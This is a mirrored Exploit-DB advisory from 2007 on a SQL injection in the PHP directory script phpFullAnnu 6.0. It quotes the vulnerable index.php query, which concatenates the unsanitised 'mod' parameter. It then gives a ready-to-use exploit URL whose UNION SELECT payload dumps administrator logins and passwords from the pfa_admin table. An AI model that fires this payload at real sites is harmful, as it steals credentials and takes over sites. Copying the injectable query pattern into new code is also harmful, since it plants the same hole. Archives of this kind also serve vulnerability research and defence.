bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4449.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

43 lines
No EOL
1.5 KiB
Text
Raw Blame History

#########################################################################################
#
# Inclusion Hunter Team
# http://www.ihteam.net
#
#
# [phpFullAnnu (PFA) 6.0]
#
#
# Class: SQL Injection # Found: 22/09/2007 # Remote: Yes # Site: http://pfa.netsliver.com/
# Download: http://pfa.netsliver.com/download/download.php?Fichier=pfa-v6.tgz
##########################################################################################
Vulnerable code:
index.php
============================================================================================================
$sqltitle = $bdd->readresult($bdd->request('SELECT h_title FROM
'.$tbprefix.'heading WHERE h_mod = \''.$_GET['mod'].'\''));
[...]
//in /include/meta.inc.php
<title><?php echo $title_site, ' - ', $sqltitle;...
//So watch Title bar to see the injection
============================================================================================================
Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
===================================================================================================================
http://www.site.com/[path]/?lang=fr&mod=login' UNION ALL SELECT concat(a_login ,0x3a,a_password) FROM pfa_admin/*
===================================================================================================================
Thanks To:
=================================
White_Sheep for his Bugs Hunter;
=================================
# milw0rm.com [2007-09-23]
Reference in a new issue View git blame Copy permalink